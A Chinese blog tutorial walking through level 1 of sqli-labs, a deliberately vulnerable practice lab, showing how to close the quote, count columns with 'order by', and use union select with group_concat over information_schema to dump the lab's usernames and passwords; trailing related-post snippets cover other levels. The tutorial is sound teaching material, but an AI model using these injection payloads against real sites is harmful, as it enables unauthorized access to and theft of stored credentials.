sql注入sqli-labs第一关

已于 2024-08-05 21:05:32 修改
阅读量831 收藏 17
点赞数 14
文章标签: sql 数据库
于 2024-08-05 19:46:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nixiaoge/article/details/140928119
版权

目录

sql注入是什么?

sqli-labs第一关--字符型注入

思路:想要利用连表查询

进一步思考如何逃脱单引号

如何知道表的列数

最终目的:注入管理员账号密码

sql注入是什么?

        注入:都是合理合法的MySQL执行语句

        产生的原因:对于输入没有做过滤,导致意外的查询语句进到了程序中,查询出来了本不应

                                该查询的数据

sqli-labs第一关--字符型注入

less-1初步的理解

        没有任何障碍,没有过滤函数,简单的接收参数,查询数据库,然后展示到前端

        代码存在的问题:对于用户的输入没有做任何过滤

        MySQL连表查询:保证字段数的一致,创建临时表保证字段一致

建立一个商品表

更改相关代码

访问gid=1的信息

思路:想要利用连表查询

        如果直接输入1 union select 1,2,3   

        而代码中呈现的是  gid=' 1 union select 1,2,3 '

        由于数据库纠错机制会删掉后面的  'union select 1,2,3'  所以执行的还是gid='1'

思路结论:没有逃脱单引号的控制

进一步思考如何逃脱单引号

进行闭合单引号---->直白点就是加单引号的方式逃脱单引号

如果   输入 1' union select 1,2,3     代码呈现:gid='1' union select 1,2,3 '

        1、单引号成对出现

        2、多出的单引号的处理思路:a.将单引号闭合b.将单引号注释掉

尝试gid=' 1 ' # '

             urlencode地址传参#会进行编码    #未编码的原因

urlencode编码规范 先转ascli码再转16进制

#的urlencode编码是%23           

替换成%23  成功

单引号逃脱解决   

进行连表查询需要表的列数

如何知道表的列数

利用order by检测列数:输入 1' order by 1%23     

        --+ 也可以注释   

问题:而+和空格的关系

原因:当使用URLEncoder时,会发现字符串中的空格被转换成“+”号,如果编码后的内容入库后,

           将导致读取时,前段本来是空格的地方,会显示成“+”号字符。

           URLEncoder.encode方法是基于application/x-www-form-urlencoded MIME格式进行编码               的。这种编码方式最初是为了在HTML表单中提交数据而设计的。根据这种编码方式的规               定,空格字符会被替换为“+”号。

           这种替换的原因主要是出于简化编码和节省空间的考虑。在表单提交中,空格是非常常见               的 字符,而将其替换为“+”号可以有效地缩短编码后的字符串长度,减少数据传输量。

使用1' order by 4%23                                             代码中为gid='1' order by 4%23'

使用 1' order by 3%23                                                  代码中为gid='1' order by 3%23'

进而得出表的列数

尝试gid='1' union select 1,2,3--+'

  

没变化的原因是呈现只显示第一表

让第一个表为空    gid为没有的值

gid='11' union select 1,2,3--+'

而2,3可以替换成mysql查询的库和用户

gid='1111' union select 1,user(),database()--+'

得到当前的用户和数据库名

最终目的:注入管理员账号密码

在MySQL上的思路

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| challenges         |
| mysql              |
| performance_schema |
| security           |
| sys                |
+--------------------+
mysql> desc tables;
+-----------------+---------------------+------+-----+---------+-------+
| Field           | Type                | Null | Key | Default | Extra |
+-----------------+---------------------+------+-----+---------+-------+
| TABLE_CATALOG   | varchar(512)        | NO   |     |         |       |
| TABLE_SCHEMA    | varchar(64)         | NO   |     |         |       |
| TABLE_NAME      | varchar(64)         | NO   |     |         |       |
| TABLE_TYPE      | varchar(64)         | NO   |     |         |       |
| ENGINE          | varchar(64)         | YES  |     | NULL    |       |
| VERSION         | bigint(21) unsigned | YES  |     | NULL    |       |
| ROW_FORMAT      | varchar(10)         | YES  |     | NULL    |       |
| TABLE_ROWS      | bigint(21) unsigned | YES  |     | NULL    |       |
| AVG_ROW_LENGTH  | bigint(21) unsigned | YES  |     | NULL    |       |
| DATA_LENGTH     | bigint(21) unsigned | YES  |     | NULL    |       |
| MAX_DATA_LENGTH | bigint(21) unsigned | YES  |     | NULL    |       |
| INDEX_LENGTH    | bigint(21) unsigned | YES  |     | NULL    |       |
| DATA_FREE       | bigint(21) unsigned | YES  |     | NULL    |       |
| AUTO_INCREMENT  | bigint(21) unsigned | YES  |     | NULL    |       |
| CREATE_TIME     | datetime            | YES  |     | NULL    |       |
| UPDATE_TIME     | datetime            | YES  |     | NULL    |       |
| CHECK_TIME      | datetime            | YES  |     | NULL    |       |
| TABLE_COLLATION | varchar(32)         | YES  |     | NULL    |       |
| CHECKSUM        | bigint(21) unsigned | YES  |     | NULL    |       |
| CREATE_OPTIONS  | varchar(255)        | YES  |     | NULL    |       |
| TABLE_COMMENT   | varchar(2048)       | NO   |     |         |       |
+-----------------+---------------------+------+-----+---------+-------+
mysql> select table_name from tables where table_schema='security';
+------------+
| table_name |
+------------+
| emails     |
| goods      |
| referers   |
| uagents    |
| users      |
+------------+
mysql> select column_name from columns where table_schema='security' and table_name='users';
+-------------+
| column_name |
+-------------+
| id          |
| username    |
| password    |
+-------------+
mysql> select username,password from security.users;
+----------+------------+
| username | password   |
+----------+------------+
| Dumb     | Dumb       |
| Angelina | I-kill-you |
| Dummy    | p@ssword   |
| secure   | crappy     |
| stupid   | stupidity  |
| superman | genious    |
| batman   | mob!le     |
| admin    | admin      |
| admin1   | admin1     |
| admin2   | admin2     |
| admin3   | admin3     |
| dhakkan  | dumbo      |
| admin4   | admin4     |
+----------+------------+

利用group_concat()将查询结果连起来

-1'union select 1,2,group_concat(table_name) from information_schema.tables --+

-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

-1' union select 1,2,group_concat(username ,id , password) from users--+

nixiaoge
关注
  • 14
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-labs第五关sql注入流程
qq_33598708的博客
03-30 5687
正常访问 http://127.0.0.1/sqli-labs-master/less-5/?id=1 判断注入类型 http://127.0.0.1/sqli-labs-master/less-5/?id=1' and 1=2 根据报错可以知道是字符注入,使用 ' 进行闭合。 通过 ' 闭合查询无返回的数据,无论是有数据返回还是无数据返回页面都不会显示相关的数据。 所以这关的重点是盲注。 http://127.0.0.1/sqli-labs-master/less-5/?id=
SQL注入sqli-labs第三关(less-3)
s_xcx_ah的博客
06-10 2242
sqli第三关简要步骤
SQL注入——sqli-labs第五关
lizhiiiii的博客
01-29 619
使用floor报错语句注入
SQL注入Sqli-labs第二关
走马
11-06 598
MYSQL数据库的所有表的信息都存储在了information_schema数据库里面的tables这个表里(information_schema.tables中两列table_schema是数据库名,table_name中表名。6.一般账号与密码都会存储在users这个表里面,所以我们要去查看users这个表里面的值,为了需要准确的得出账号与密码,可以先对里面的字段进行查询(information_schema.columns表中三列table_schema是数据库名,本次注入sql-labs的第二关。
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 14万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
SQL注入——sqli-labs第二十四关
lizhiiiii的博客
02-01 596
这一关我们使用二次注入,因为登录页面和注册页面都用了mysql_real_escape_string函数对于特殊字符转义。
sqli-labs 第七关 多命通关攻略
两个月亮
01-05 1676
错误输入与不正常输入的返回结果是相同的。该页面的 PHP 代码存在这么一个判断语句,在 SQL 查询结果不为空集时,返回结果为;反之返回。怎么会这样?等等,我们刚刚得出的结论好像被忽略了:该页面的 PHP 代码存在这么一个判断语句,在 SQL 查询结果不为空集时,返回结果为;反之返回。既然返回结果为空都将返回,那我们刚刚构造的判断语句又怎么能够判断出注入类型呢?在遇到读写权限问题后,尝试向搜索引擎寻求帮助,但解决方案大多针对 Linux 操作系统且并不详细,只好自己摸索了。
sqli-labs第七关sql注入流程
qq_33598708的博客
04-09 3600
正常访问 http://127.0.0.1/sqli-labs-master/Less-7/?id=1 正常访问以后提示Use outfile..... 什么是outfile:参考地址 MySQL中你可以使用SELECT...INTO OUTFILE语句来简单的导出数据到文本文件上。 判断注入类型 http://127.0.0.1/sqli-labs-master/Less-7/?id=1' and '1'='1 通过注入字符没有报错可以判断是字符类型的,这关数据库报错不会提示
sqli-labs靶场第一关详解
qq_43784516的博客
01-28 1396
sql注入是指web应用程序对用户输入的数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的sql语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
sqli-labs靶场练习笔记
11-09
- **SQLi-Labs介绍**:SQLi-Labs是一款专为学习和实践SQL注入技术而设计的靶场环境。它包含了多个关卡,每个关卡都模拟了一个具有特定SQL注入漏洞的应用场景。 - **学习价值**:通过解决这些关卡中的问题,学习者...
sqli-labs闯关小游戏21-65.docx
10-23
sqli-labs是一个专门用于学习和练习SQL注入技巧的平台,其关卡设计由易到难,帮助用户深入理解这种攻击方式。 在第21关中,我们可以看到利用了`UNION SELECT`语法,这是SQL注入的经典手法,通过将恶意SQL插入到合法...
SQLi-LABS Page-1(Basic Challenges)1-22
05-18
通过以上步骤,我们可以系统地了解并掌握从第一关到第九关的SQL注入攻击技巧,这些技巧涵盖了从基础的字符型和数字型注入到更高级的时间注入和复杂闭合方式的使用。每个关卡都提供了不同的挑战,帮助玩家深入理解SQL...
详细sqli-labs(1-20)通关讲解
05-18
#### 第一关:判断是否存在 SQL 注入 本关目的是为了帮助用户了解如何判断一个网站是否存在 SQL 注入漏洞,并通过不同的输入来观察反馈信息的变化,以此来确认是否存在漏洞。 **实验步骤** 1. **初步判断**: - ...
SQL注入练习.rar
06-25
在 "sqli-labs" 靶场中,每个关卡可能代表一个特定的SQL注入场景,如基于错误的注入、基于时间的延迟注入、盲注、多语句注入等。用户需要分析服务器的响应,构造适当的查询来揭示信息或完成挑战。这将涉及理解SQL...
kubernetes集群部署sql server数据库服务
最新发布
jiang0615csdn的博客
08-08 456
kubernetes集群部署sql server数据库服务
dbeaver 导入sql 报错,ERROR 2059 (HY000)
hyq_07_27的博客
08-07 255
ERROR 2059 (HY000): Authentication plugin ‘caching_sha2_password’ cannot be loaded: 鎵句笉鍒版寚瀹氱殑妯″潡銆�。下载后解压压缩包,点击“添加数据库地址”按钮,选择新的MySQL8的所在目录.再次导入就可以了。可以下载 MySQL免安装版配置教程mysql-8.0.39-winx64.zip。先mysql连接设置,查看一下dbeaver的mysql 版本,是5.5.62.版本问题,MySQL8之后更换了密码认证策略。
QSqlQueryModel与QSqlTableModel查询数据库
weixin_39688581的博客
08-08 203
项目中需要对数据进行查询与展示,数据量不大,使用的是sqlite数据库,将使用过程记录如下。
postgreSQL16添加审计功能
ciqingloveless的博客
08-07 210
他的分支版本支持不同的PGSQL按需下载。
sqli-labs第一关详情解答
09-14
对于sqli-labs的第一关,我们需要利用SQL注入漏洞来绕过登录验证,以下是详细解答: 1. 打开sqli-labs的网址,进入第一关页面。 2. 在登录框中输入任意用户名和密码,点击登录按钮。 3. 在跳转的页面中,我们可以看到URL中的参数"id"的值,比如:http://localhost/sqli-labs/Less-1/?id=1。我们需要利用这个参数进行注入。 4. 在id参数后面添加单引号('),并在URL末尾添加注释符(--)使其变为注释,比如:http://localhost/sqli-labs/Less-1/?id=1'--。 5. 点击回车进行页面访问,如果页面中显示出了登录成功的提示信息,说明我们成功地绕过了登录验证。 6. 通过这个注入点,我们可以进一步尝试使用其他常见的SQL注入技巧来获取更多信息或者执行进一步的攻击。 需要注意的是,在真实环境中,执行SQL注入攻击是违法行为,请仅在合法授权范围内进行相关测试和学习。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值